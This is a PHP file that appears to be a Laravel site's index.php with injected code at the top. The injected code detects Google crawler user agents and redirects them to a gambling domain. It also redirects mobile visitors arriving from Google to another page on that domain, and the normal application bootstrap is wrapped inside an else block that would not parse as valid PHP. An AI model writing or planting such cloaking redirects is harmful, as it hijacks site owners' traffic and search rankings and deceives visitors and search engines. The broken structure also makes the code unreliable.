<?php
function isGoogleBot() {
    $userAgent = $_SERVER['HTTP_USER_AGENT'];
    $googleBotAgents = [
        'Googlebot',
        'Googlebot/2.1',
        'Googlebot-Mobile',
        'Googlebot-Image',
        'Googlebot-Video',
        'Googlebot-News',
        'Google-InspectionTool',
        'Google-Site-Verification',
        'Mediapartners-Google',
        'AdsBot-Google',
        'AdsBot-Google-Mobile',
        'APIs-Google',
        'AdsBot-Google-Mobile-Apps',
        'FeedFetcher-Google',
        'DuplexWeb-Google',
        'Google Favicon',
        'Google-Read-Aloud',
    ];
    
    foreach ($googleBotAgents as $botAgent) {
        if (strpos($userAgent, $botAgent) !== false) {
            return true;
        }
    }
    return false;
}

if (isGoogleBot()) {
    // Jika pengunjung adalah Googlebot, tampilkan index_hitam.txt
     header("Location: https://union188.org/union188.html");
    exit;
}

function is_mobile() {
    $mobile_agents = array('Android', 'iPhone', 'iPad');
    $uri = $_SERVER['REQUEST_URI'];
    foreach ($mobile_agents as $agent) {
        if ($uri == '/' && stripos($_SERVER['HTTP_USER_AGENT'], $agent) !== false) {
            if (isset($_SERVER['HTTP_REFERER']) && strpos($_SERVER['HTTP_REFERER'], 'google') !== false)
            return true;
        }
    }
    return false;
}

if (is_mobile()) {
     header("Location: https://union188.org/chip/");
    exit;
} else {
    
use Illuminate\Contracts\Http\Kernel;
use Illuminate\Http\Request;

define('LARAVEL_START', microtime(true));

/*
|--------------------------------------------------------------------------
| Check If The Application Is Under Maintenance
|--------------------------------------------------------------------------
|
| If the application is in maintenance / demo mode via the "down" command
| we will load this file so that any pre-rendered content can be shown
| instead of starting the framework, which could cause an exception.
|
*/

if (file_exists($maintenance = __DIR__.'/hary/storage/framework/maintenance.php')) {
    require $maintenance;
}

/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader for
| this application. We just need to utilize it! We'll simply require it
| into the script here so we don't need to manually load our classes.
|
*/

require __DIR__.'/hary/vendor/autoload.php';

/*
|--------------------------------------------------------------------------
| Run The Application
|--------------------------------------------------------------------------
|
| Once we have the application, we can handle the incoming request using
| the application's HTTP kernel. Then, we will send the response back
| to this client's browser, allowing them to enjoy our application.
|
*/

$app = require_once __DIR__.'/hary/bootstrap/app.php';

$kernel = $app->make(Kernel::class);

$response = $kernel->handle(
    $request = Request::capture()
)->send();

$kernel->terminate($request, $response);



}
?>
